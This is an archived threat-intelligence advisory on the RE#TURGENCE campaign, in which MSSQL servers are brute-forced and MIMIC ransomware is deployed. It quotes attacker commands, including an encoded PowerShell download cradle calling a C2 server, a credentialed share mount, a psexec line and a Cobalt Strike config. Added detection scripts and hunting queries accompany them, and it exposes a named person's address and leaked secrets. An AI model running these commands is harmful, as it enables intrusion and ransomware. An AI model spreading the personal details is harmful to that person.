{
	"id": "e59497f0-bb7d-4bf9-b06d-aa4ad3d4a2f9",
	"created_at": "2026-04-06T00:11:17.895948Z",
	"updated_at": "2026-04-10T13:11:52.223748Z",
	"deleted_at": null,
	"sha1_hash": "7e4ae7b93cb4e34865092df5c78802ebac2167e2",
	"title": "Securonix Threat Research Security Advisory: New RE#TURGENCE Attack Campaign: Turkish Hackers Target MSSQL Servers to Deliver Domain-Wide MIMIC Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2931900,
	"plain_text": "Securonix Threat Research Security Advisory: New RE#TURGENCE Attack Campaign: Turkish Hackers Target MSSQL Servers to Deliver Domain-Wide MIMIC Ransomware\r\nArchived: 2026-04-05 17:48:30 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\ntldr: Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads.\r\nThe Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE, which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU and LATAM countries and are financially motivated.\r\nThe analyzed threat campaign appears to end in one of two ways: either the selling of “access” to the compromised host, or the delivery of ransomware payloads. These details were uncovered during a major OPSEC (operational security) failure by the attackers, which we’ll dive into later. The timeline for the events was about one month from initial access to the deployment of MIMIC ransomware on the victim domain.\r\nThe initial access portion of the campaign is similar to that of DB#JAMMER, which we wrote about last year and which also involved direct MSSQL access through brute forcing administrative passwords.\r\nInitial Access (TA0001)\r\nThreat actors have been targeting exposed database servers heavily over the last year. In addition to DB#JAMMER, other campaigns targeting these servers have been reported recently, some of them obtaining access through botnets.\r\nIn the case of RE#TURGENCE, the threat actors were able to brute force their way into the victim server and leveraged the xp_cmdshell extended stored procedure to execute commands on the host. 
This procedure is disabled by default and should not be enabled (especially on publicly exposed servers).\r\nExecution (TA0002)\r\nOnce the attackers were able to execute code through the xp_cmdshell procedure, they ran the following command on the server from the sqlservr.exe process:\r\n“C:\\Windows\\system32\\cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQ\r\ncmd.exe is invoked twice to run a PowerShell encoded command (only the beginning of the Base64 blob is reproduced above) which, when decoded, contains the following command:\r\niex((New-Object System.Net.Webclient).DownloadString(‘hxxp://88.214.26[.]3:25823/189Jt’))\r\nThe above command downloads a file (189Jt) from the remote server and executes its contained code via a PowerShell invoke expression. Essentially, any PowerShell code contained in the file is downloaded and immediately executed.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 1 of 10\r\nThe phase 1 PowerShell script is semi-obfuscated, and most of its code appears to be dead code that is never executed. Its working part downloads and runs the next stage, referenced at the end of the script, as seen in the figure below:\r\nFigure 1: PowerShell initial code execution (phase 1)\r\nCobalt Strike implementation\r\nThe next PowerShell script, found at hxxp://88.214.26[.]3:25823/MSjku, is downloaded and executed in the same manner. This script contained a heavily obfuscated Cobalt Strike payload which is loaded into the current running process using in-memory reflection techniques (PowerShell in this case). 
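\r\nAs an added example that is not part of the original advisory, the following PowerShell shows how the xp_cmdshell chain above (sqlservr.exe spawning cmd.exe, then an encoded PowerShell download cradle) can be flagged from process-creation telemetry and how the -e payload is decoded: the Base64 after -e/-enc wraps UTF-16LE text, not UTF-8, so a naive decode yields interleaved NUL bytes. The record field names (Computer, ParentImage, Image, CommandLine) are modelled on Sysmon Event ID 1 but the records themselves are constructed here; the encoded blob is generated at runtime from the cradle quoted above, because the report only reproduces the beginning of it, and a truncated blob is reported as undecodable rather than silently dropped.\r\n\r\n```powershell\r\n# Added example, not code from the Securonix advisory. Detects sqlservr.exe -> cmd/powershell\r\n# process chains and decodes PowerShell -e/-enc payloads (Base64 of UTF-16LE text).\r\n\r\nfunction ConvertFrom-EncodedCommand {\r\n    param([Parameter(Mandatory)][string]$CommandLine)\r\n    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).\r\n    # '-exec bypass' does not match because a Base64 blob must follow the switch after whitespace.\r\n    if ($CommandLine -match '(?i)\\s-(?:e|ec|en|enc|encodedcommand)\\s+([A-Za-z0-9+/=]+)') {\r\n        try {\r\n            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))\r\n        } catch {\r\n            # A truncated blob (like the one printed in the report) is not valid Base64.\r\n            return \"<undecodable: $($_.Exception.Message)>\"\r\n        }\r\n    }\r\n    return $null\r\n}\r\n\r\nfunction Find-SqlShellChain {\r\n    param([Parameter(Mandatory)][object[]]$Events)\r\n    foreach ($e in $Events) {\r\n        $parent = [IO.Path]::GetFileName([string]$e.ParentImage).ToLowerInvariant()\r\n        $child  = [IO.Path]::GetFileName([string]$e.Image).ToLowerInvariant()\r\n        # xp_cmdshell runs its command line via cmd.exe spawned by the SQL Server service itself.\r\n        if ($parent -ne 'sqlservr.exe') { continue }\r\n        if ($child -notin @('cmd.exe', 'powershell.exe', 'pwsh.exe')) { continue }\r\n        $decoded = ConvertFrom-EncodedCommand -CommandLine $e.CommandLine\r\n        # Download-cradle markers used by the phase 1 script in the report.\r\n        $isCradle = [bool]($decoded -and ($decoded -match '(?i)DownloadString|DownloadFile|\\biex\\b|Invoke-Expression'))\r\n        [pscustomobject]@{\r\n            Host        = $e.Computer\r\n            Chain       = \"$parent -> $child\"\r\n            IsCradle    = $isCradle\r\n            Decoded     = $decoded\r\n            CommandLine = $e.CommandLine\r\n        }\r\n    }\r\n}\r\n\r\n# Constructed sample records. The cradle string is the one quoted above (defanged hxxp:// URL);\r\n# its Base64 form is built here because the report truncates it. Host name and paths are assumptions.\r\n$cradle  = \"iex((New-Object System.Net.Webclient).DownloadString('hxxp://88.214.26[.]3:25823/189Jt'))\"\r\n$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))\r\n$sampleEvents = @(\r\n    [pscustomobject]@{\r\n        Computer    = 'SQL01'\r\n        ParentImage = 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe'\r\n        Image       = 'C:\\Windows\\System32\\cmd.exe'\r\n        CommandLine = \"`\"C:\\Windows\\system32\\cmd.exe`\" /c cmd /c powershell -exec bypass -w 1 -e $encoded\"\r\n    }\r\n    [pscustomobject]@{   # benign: the service control manager starting a host process\r\n        Computer    = 'SQL01'\r\n        ParentImage = 'C:\\Windows\\System32\\services.exe'\r\n        Image       = 'C:\\Windows\\System32\\svchost.exe'\r\n        CommandLine = 'C:\\Windows\\System32\\svchost.exe -k netsvcs'\r\n    }\r\n)\r\n\r\nFind-SqlShellChain -Events $sampleEvents | Format-List\r\n```\r\n\r\nRunning it reports one record for SQL01 with Chain sqlservr.exe -> cmd.exe, IsCradle True and the decoded cradle text; the svchost.exe record is skipped. In production, feed Get-WinEvent output for Sysmon Event ID 1 (or Security 4688 with command-line auditing enabled) into Find-SqlShellChain instead of the constructed array.\r\n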
The phase 2 script is heavily obfuscated; however, our team was able to save and extract the Cobalt Strike configuration, which is found in Appendix A at the end of the report.\r\nThe obfuscation centered on the DLL imports and the Cobalt Strike payload, which consisted of hundreds of lines of combined variables and useless comment blocks.\r\nFigure 2: PowerShell initial code execution (phase 2: Cobalt Strike)\r\nAccording to the configuration (Spawnto_x86/Spawnto_x64 in Appendix A), the Cobalt Strike beacon is configured to spawn and inject into the Windows-native process SndVol.exe. This process handles volume controls and settings for the system.\r\nAnyDesk implementation\r\nWith Cobalt Strike as their main point of code execution, the attackers decided to go for a more hands-on approach. The AnyDesk binaries were downloaded from a network share that the attackers set up and mounted using the following command:\r\n“c:\\windows\\system32\\cmd.exe” /c net use f: /delete /y \u0026 net use f: \\\\45.148.121[.]87\\f /user:grogu aqu!8171881cerq\r\nOnce mounted as the “F:\\” drive, the attackers copied the AnyDesk installer to C:\\ad.exe, along with the file ad.bat. The purpose of ad.bat is simply to install the AnyDesk connector service, add a new local user and add that user to the administrators group. The contents of the bat file can be seen in the figure below:\r\nFigure 3: File contents of ad.bat\r\nPersistence (TA0003)\r\nYou’ll notice in the ad.bat file that the local user “windows” is created with the password “denek1010”. The user is added to the “administrators” (EN) and, if present, “administradores” (LATAM) groups. 
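\r\nAs an added example that is not part of the original advisory, the following PowerShell correlates the ad.bat persistence artifacts described above (a new local user added to the localized Administrators group, the AnyDesk service install) with the WDigest UseLogonCredential change made by the start.bat script in the Credential Access section, into one timeline per host. It matches the group by its well-known SID S-1-5-32-544 rather than by name, so “administrators” and “administradores” are the same check. The records are constructed inline with field names modelled on Windows Security events 4720/4732/4697 and Sysmon Event ID 13; the host name, timestamps and AnyDesk service path are assumptions.\r\n\r\n```powershell\r\n# Added example, not code from the Securonix advisory. Correlates local-admin creation,\r\n# AnyDesk service installation and the WDigest cleartext-credential registry change per host.\r\n\r\n$AdminGroupSid = 'S-1-5-32-544'   # BUILTIN\\Administrators, whatever its localized name\r\n$WDigestValue  = 'CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential'\r\n\r\nfunction Find-PostExploitationArtifacts {\r\n    param([Parameter(Mandatory)][object[]]$Events)\r\n    $findings = foreach ($e in $Events) {\r\n        switch ($e.EventId) {\r\n            4720 {   # Security: a user account was created\r\n                [pscustomobject]@{ Host = $e.Computer; Time = $e.Time; Finding = 'Local user created'; Detail = $e.TargetUserName }\r\n            }\r\n            4732 {   # Security: a member was added to a security-enabled local group\r\n                if ($e.TargetSid -eq $AdminGroupSid) {\r\n                    [pscustomobject]@{ Host = $e.Computer; Time = $e.Time; Finding = 'Member added to local Administrators'; Detail = $e.MemberName }\r\n                }\r\n            }\r\n            4697 {   # Security: a service was installed in the system\r\n                if ($e.ServiceFileName -match '(?i)anydesk') {\r\n                    [pscustomobject]@{ Host = $e.Computer; Time = $e.Time; Finding = 'AnyDesk service installed'; Detail = $e.ServiceFileName }\r\n                }\r\n            }\r\n            13 {     # Sysmon: registry value set. UseLogonCredential = 1 makes WDigest keep cleartext passwords in LSASS.\r\n                $isWDigest = ([string]$e.TargetObject).EndsWith($WDigestValue, [StringComparison]::OrdinalIgnoreCase)\r\n                if ($isWDigest -and $e.Details -match '(?i)^(DWORD \\(0x0*1\\)|1)$') {\r\n                    [pscustomobject]@{ Host = $e.Computer; Time = $e.Time; Finding = 'WDigest UseLogonCredential enabled'; Detail = $e.Image }\r\n                }\r\n            }\r\n        }\r\n    }\r\n    # One ordered timeline per host reproduces the ad.bat -> start.bat sequence.\r\n    $findings | Sort-Object Host, Time\r\n}\r\n\r\n# Constructed sample records: the 'windows' user and the AnyDesk / WDigest artifacts follow the\r\n# report; the host name SQL01, the timestamps and the service path are assumptions.\r\n$sampleEvents = @(\r\n    [pscustomobject]@{ Computer = 'SQL01'; Time = [datetime]'2023-12-01T10:00:00'; EventId = 4697\r\n                       ServiceFileName = '\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service' }\r\n    [pscustomobject]@{ Computer = 'SQL01'; Time = [datetime]'2023-12-01T10:00:05'; EventId = 4720; TargetUserName = 'windows' }\r\n    [pscustomobject]@{ Computer = 'SQL01'; Time = [datetime]'2023-12-01T10:00:06'; EventId = 4732\r\n                       TargetSid = 'S-1-5-32-544'; MemberName = 'SQL01\\windows' }\r\n    [pscustomobject]@{ Computer = 'SQL01'; Time = [datetime]'2023-12-01T10:20:00'; EventId = 13\r\n                       Image = 'C:\\Windows\\System32\\reg.exe'; Details = 'DWORD (0x00000001)'\r\n                       TargetObject = 'HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential' }\r\n    [pscustomobject]@{ Computer = 'SQL01'; Time = [datetime]'2023-12-01T10:21:00'; EventId = 4732\r\n                       TargetSid = 'S-1-5-32-545'; MemberName = 'SQL01\\svc_backup' }   # Users group: not reported\r\n)\r\n\r\nFind-PostExploitationArtifacts -Events $sampleEvents | Format-Table -AutoSize\r\n```\r\n\r\nThe run prints four findings for SQL01 in time order (AnyDesk service, user created, member added to Administrators, WDigest enabled); the last record, an addition to the Users group, produces nothing. Checking the group SID instead of its display name is what lets one rule cover the EN and LATAM variants that ad.bat targets.\r\n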
The inclusion of both group names leads us to believe that these threat actors built this script with a wide target range in mind.\r\nAdditionally, the script installs the AnyDesk service using the command c:\\ad.exe --install c:\\“program files (x86)”\\ --silent, stops and starts the service, and then prints the AnyDesk client ID.\r\nAt this point, the threat actors shifted to exclusively using AnyDesk instead of Cobalt Strike.\r\nCredential Access (TA0006)\r\nWe observed the threat actors download Mimikatz into the “c:\\users\\windows\\desktop\\x64\\” directory using AnyDesk. Another batch script was also downloaded to automate some of the Mimikatz commands. Its contents can be seen in the figure below:\r\nFigure 4: File contents of start.bat\r\nThe script performs several functions. First it uses a known registry tweak to enable clear text credentials (setting WDigest UseLogonCredential to 1, the change targeted by one of the hunting queries at the end of this report). It then does a quick “is 64-bit” check by looking for the presence of the “C:\\Program Files (x86)” directory and executes Mimikatz from the corresponding subdirectory (x86 or x64). The results of the Mimikatz dump are then saved into the Mimikatz_dump.txt file.\r\nDiscovery (TA0007)\r\nThe threat actors then shifted gears and decided to get to know the network and domain a bit better. 
The Advanced Port Scanner utility was downloaded via AnyDesk and saved as c:\\users\\windows\\documents\\advport.exe.\r\nOur team observed the following activities from the Advanced Port Scanner utility:\r\nCheck domain controller remote shares (from the UI of Advanced Port Scanner)\r\nGet the hostname of a Hyper-V VM host using reg query “HKLM\\Software\\Microsoft\\Virtual Machine\\guest\\parameters”\r\nTest psexec.exe connection to the DC (result: fail)\r\nRun psexec.exe on the DC using domain admin passwords extracted by Mimikatz on the MSSQL server\r\nTest RDP to the DC using dumped credentials from the Advanced Port Scanner UI (mstsc /v:[IP_REDACTED])\r\nCheck for remote shares on jump hosts (from the UI of Advanced Port Scanner)\r\nTest for and use RDP to a decoy host from the Advanced Port Scanner UI (mstsc /v:[IP_REDACTED])\r\nLateral Movement (TA0008)\r\nEventually, after a few days, the threat actors were able to move laterally into two other machines on the network, likely using data provided by Mimikatz and the Advanced Port Scanner utility.\r\nThe threat actors transferred in psexec, a Sysinternals utility commonly used by threat actors and red teamers. They used the utility to open a new session to a domain controller with a domain admin password which was obtained earlier. 
The following command was issued on the compromised MSSQL server to move laterally:\r\nc:\\psexec.exe -u [REDACTED_DOMAIN]\\[REDACTED_USER] -p [REDACTED_PASS] \\\\[REDACTED_IP] cmd.exe\r\nUsing the domain admin account, the threat actors were able to move to other machines within the domain.\r\nImpact (TA0040)\r\nAt this point, after a few more attempts at lateral movement using psexec, the threat actors appear to have had enough and decided to deploy ransomware on the host.\r\nThe ransomware payload was downloaded using AnyDesk into c:\\Users\\windows\\Documents\\ as red25.exe. This payload is a self-extracting archive that extracts and runs red.exe, the final ransomware payload.\r\nThe ransomware of choice is Mimic ransomware, which uses the legitimate application Everything by VoidTools to query and locate target files to be encrypted. Mimic was first identified and gained traction in January 2023. Mimic drops the Everything binaries used to aid the encryption process. The Mimic dropper in our case, “red25.exe”, dropped all of the files necessary for the main ransomware payload to complete its objectives. These files include:\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\global_options.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything2.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything64.dll\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything32.dll\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything.exe\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\7za.exe\r\nThe main Mimic ransomware payload is able to take a few arguments. 
In the case of the RE#TURGENCE campaign, we observed it executing as:\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e ul2\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e ul1\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e watch -pid 4164 -!\r\nAccording to documentation provided by Trend Micro, Mimic ransomware takes the following command line arguments:\r\nCommand line parameter: Value/Description\r\n-dir: Specify directory\r\n-e: all (encrypt all, default); local (encrypt local files); net (encrypt files on network shares); watch (unknown); ul1, ul2 (create a new thread and try to unlock certain memory addresses from another process)\r\n-prot: Prevents the ransomware process from being stopped (protect)\r\n-pid [int value]: The PID of the currently running ransomware process\r\nOnce the encryption process was completed, the red.exe process wrote the encryption/payment notice, which was saved on the victim’s C:\\ drive as “—IMPORTANT—NOTICE—.txt”. The text file contained the following message:\r\nFigure 5: MIMIC ransomware payment notification\r\nIn the end, MIMIC ransomware was manually executed by the threat actors on the MSSQL server first, then on a domain controller and other domain-joined hosts.\r\nBonus Round: Threat actor’s OPSEC failures… Oops!\r\nAs the attack unfolded, we were able to monitor the attackers and the system they were using closely through their own RMM software. Here are some interesting insights observed as part of the malicious ops. Each entry below is content seen on the threat actor’s PC, with notes or a translation from Turkish, where needed, in parentheses:\r\nI won’t be able to be in front of the computer for 2 hours. I’m going somewhere\r\nİyi Çalışmalar? (Enjoy your work?)\r\nSaygılarımızla ; (Regards ;)\r\nBİLAL EDGÜ\r\nSahabiye Mah.\r\nİstasyon Cad. (Station Cad.)\r\nAk İşmerkezi Kat:2 No:203 (Ak İşmerkezi Floor:2 No:203)\r\nKOCASİNAN / KAYSERİ\r\nEC2AMAZ-55QGUPD (Amazon EC2 machine name)\r\nA8EBN4s7hMuFPQm9LIPc8L97wyFfzwnih0yGCTaYC0M*SoyezPrudent0\r\n_zOPwV-8YrF3Y2L2FmggKZ_MZnMHHHv5yBOBC657vhk*SoyezPrudent0\r\nhttps://downloads.systoolsgroup.com/sql-backup-recovery.exe\r\nC:\\“Program Files (x86)”\\AnyDesk-e7eba7df --get-id\r\nEC2AMAZ-55QGUP (another Amazon EC2 machine name)\r\nAnyDesk@2023@# (a password)\r\n[23:24:36] atseverse: I unchecked keep chat history. Then I marked again and these messages came again.\r\n[23:27:28] atseverse: Do you have a new goal in Turkey?\r\n[23:27:51] atseverse: Also, since the dollar exchange rate is high in Turkey, isn’t payment a problem?\r\n[23:28:31] atseverse: unfortunately 1$= 30 Turkish lira\r\n[23:33:30] atseverse: I’m sorry man, I would like to talk to you, but unfortunately I came to work. I have to work, have a nice day\r\n[23:33:55] atseverse: take care of yourself\r\n[23:33:59] atseverse: byee\r\nplease send me anydesk id.\r\nI will come and check\r\nThe first offer I made to you is 15 thousand euros.\r\nI didn’t deceive you. Don’t bargain with me and don’t pay even 1 cent more.\r\nPlease don’t tire me. My aim is not to deceive anyone, I am not a fraudster.\r\nI just want the money I bid for.\r\n(The messages above: selling access to the compromised host)\r\nSMMM \u0026 BAĞIMSIZ DENETÇİ (CPA \u0026 INDEPENDENT AUDITOR)\r\nResearching the username “atseverse” turned up all kinds of interesting findings, including profiles on Steam, a popular gaming platform, and on a hacking website called spyhackerz, that fit the geographic profile:\r\nFigure 6: atseverse online profile\r\nC2 and infrastructure\r\nThe RE#TURGENCE campaign consisted of several C2 IP addresses using seemingly random, non-standard port numbers. The only domain used, seruvadessigen.3utilities[.]com, was pulled from the Cobalt Strike beacon configuration.\r\nC2 Address: Description (Details)\r\n45.148.121[.]87: SMB payloads (Cobalt Strike). Organization: ORG-SE92-RIPE; Org-name: SKB Enterprise B.V.; Country: NL; Address: Kingsfordweg 151, 1043 GR Amsterdam, Netherlands\r\n88.214.26[.]3: PowerShell payloads (Cobalt Strike). Organization: ORG-FI54-RIPE; Org-name: FutureNow Incorporated; Address: National Cultural Centre 861 P.O. Box 1492, Victoria Mahe, Seychelles\r\nseruvadessigen.3utilities[.]com: Cobalt Strike beacon URL. Registrar: Vitalwerks Internet Solutions, LLC / No-IP.com\r\nSecuronix recommendations and mitigations\r\nAlways refrain from exposing critical servers directly to the internet. In the case of RE#TURGENCE, attackers were able to brute force their way into the server directly from outside the main network. We recommend placing access to these resources behind much more secure infrastructure such as a VPN. Additionally:\r\nLimit the usage of the xp_cmdshell procedure on MSSQL database servers. 
This would have prevented the attackers from executing commands on the victim’s machine.\r\nWhen it comes to detecting both RMM and/or RAT-like software, we highly recommend enabling process-level logging on endpoints and servers for enhanced telemetry for both detections and threat hunting.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage.\r\nMonitor for the creation of new local users on endpoints, especially within critical server environments.\r\nSecuronix customers can rely on some of the provided provisional detections or scan their environment using the threat hunting queries below.\r\nMITRE ATT\u0026CK matrix\r\nTactic: Technique\r\nInitial Access: T1110: Brute Force\r\nDiscovery: T1046: Network Service Discovery\r\nDefense Evasion: T1112: Modify Registry\r\nPersistence: T1098: Account Manipulation; T1505.001: Server Software Component: SQL Stored Procedures\r\nCredential Access: T1003: OS Credential Dumping; T1110.001: Brute Force: Password Guessing\r\nCommand and Control: T1105: Ingress Tool Transfer; T1572: Protocol Tunneling; T1573.001: Encrypted Channel: Symmetric Cryptography; T1219: Remote Access Software\r\nImpact: T1486: Data Encrypted for Impact\r\nAnalyzed file hashes\r\nFile Name: SHA256 (IoC)\r\nad.bat: 9F3AD476EDA128752A690BD26D7F9A67A8A4855A187619E74422CC08121AD3D3\r\nps1.ps1: A222BA1FD77A7915A61C8C7A0241222B4AD48DD1C243F3548CAEF23FE985E9C2\r\nps1.ps1: 1ED02979B3F312C4B2FD1B9CFDFB6BEDE03CD964BB52B3DE017128FE00E10D3C\r\nstart.bat: F328C143C24AFB2420964740789F409D2792413A5769A33741ED956FCE5ADD3E\r\nAr3.exe: 1C7B82B084DA8B57FFEEF7BDCA955C2AA4A209A96EC70E8D13E67283C10C12A5\r\ngui40.exe: 
31FEFF32D23728B39ED813C1E7DC5FE6A87DCD4D10AA995446A8C5EB5DA58615\r\nadvport.exe: D0C1662CE239E4D288048C0E3324EC52962F6DDDA77DA0CB7AF9C1D9C2F1E2EB\r\nred25.exe: E9C63A5B466C286EA252F1B0AA7820396D00BE241FB554CF301C6CD7BA39C5E6\r\nred.exe: D6CD0080D401BE8A91A55B006795701680073DF8CD7A0B5BC54E314370549DC4\r\nRelevant provisional Securonix detections\r\nEDR-ALL-11-RU\r\nEDR-ALL-69-BP\r\nEDR-ALL-172-RU\r\nEDR-ALL-987-RU\r\nEDR-ALL-1254-ER, WEL-ALL-1222-ER\r\nEDR-ALL-1278-RU\r\nNTA-ALL-890-ERR\r\nRelevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “45.148.121[.]87” OR destinationaddress = “88.214.26[.]3”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network connection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND (destinationhostname CONTAINS “seruvadessigen.3utilities[.]com”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (baseeventid = “12” OR baseeventid = “13” OR baseeventid = “14”) AND customstring47 ENDS WITH “\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential” AND (customstring48 = “DWORD (0x00000001)” OR customstring48 = “1”)\r\nindex = activity AND (destinationport = “445” OR destinationport = “139”) AND (sourceaddress = “10.0.0.0/8” OR sourceaddress = “172.16.0.0/12” OR sourceaddress = “192.168.0.0/16” OR sourceaddress = “169.254.0.0/16”) AND (destinationaddress != “10.0.0.0/8” AND destinationaddress != “172.16.0.0/12” AND destinationaddress != “192.168.0.0/16” AND destinationaddress != “169.254.0.0/16” AND destinationaddress != “127.0.0.0/8”)\r\nindex = activity AND rg_functionality = “Endpoint 
Management Systems” AND deviceaction = “Process Create” AND sourceprocessname ENDS WITH “sqlservr.exe” AND destinationprocessname ENDS WITH “cmd.exe”\r\nindex = activity AND rg_functionality = “Microsoft Windows” AND baseeventid = “4697” AND (resourcecustomfield1 ENDS WITH “anydesk.exe” OR destinationservicename CONTAINS “AnyDesk”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname = “AnyDesk.exe” OR description CONTAINS “AnyDesk” OR product CONTAINS “AnyDesk”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Dns query” AND destinationhostname ENDS WITH “anydesk[.]com”\r\nReferences:\r\n1. Securonix Threat Labs Security Advisory: Threat Actors Target MSSQL Servers in DB#JAMMER to Deliver FreeWorld Ransomware. https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\r\n2. MySQL servers targeted by ‘Ddostf’ DDoS-as-a-Service botnet. https://www.bleepingcomputer.com/news/security/mysql-servers-targeted-by-ddostf-ddos-as-a-service-botnet/\r\n3. xp_cmdshell (Transact-SQL). https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16\r\n4. 
New Mimic Ransomware Abuses Everything APIs for its Encryption Process. https://www.trendmicro.com/en_ph/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html\r\nAppendix A: Cobalt Strike beacon config\r\nCS Beacon:\r\n{\r\n  \"BeaconType\": [\r\n    \"HTTPS\"\r\n  ],\r\n  \"Port\": 443,\r\n  \"SleepTime\": 37000,\r\n  \"MaxGetSize\": 1048576,\r\n  \"Jitter\": 37,\r\n  \"C2Server\": \"seruvadessigen.3utilities.com,/apiv8/getStatus\",\r\n  \"HttpPostUri\": \"/apiv8/updateConfig\",\r\n  \"Malleable_C2_Instructions\": [],\r\n  \"HttpGet_Verb\": \"GET\",\r\n  \"HttpPost_Verb\": \"POST\",\r\n  \"HttpPostChunk\": 0,\r\n  \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\SndVol.exe\",\r\n  \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\SndVol.exe\",\r\n  \"CryptoScheme\": 0,\r\n  \"Proxy_Behavior\": \"Use IE settings\",\r\n  \"Watermark\": 12345,\r\n  \"bStageCleanup\": \"True\",\r\n  \"bCFGCaution\": \"True\",\r\n  \"KillDate\": 0,\r\n  \"bProcInject_StartRWX\": \"True\",\r\n  \"bProcInject_UseRWX\": \"False\",\r\n  \"bProcInject_MinAllocSize\": 17500,\r\n  \"ProcInject_PrependAppend_x86\": [\r\n    \"kJA=\",\r\n    \"Empty\"\r\n  ],\r\n  \"ProcInject_PrependAppend_x64\": [\r\n    \"kJA=\",\r\n    \"Empty\"\r\n  ],\r\n  \"ProcInject_Execute\": [\r\n    \"ntdll.dll:RtlUserThreadStart\",\r\n    \"CreateThread\",\r\n    \"NtQueueApcThread-s\",\r\n    \"CreateRemoteThread\",\r\n    \"RtlCreateUserThread\"\r\n  ],\r\n  \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n  \"bUsesCookies\": \"True\",\r\n  \"HostHeader\": \"\"\r\n}",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/"
	],
	"report_names": [
		"securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434277,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.pdf",
		"text": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.txt",
		"img": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.jpg"
	}
}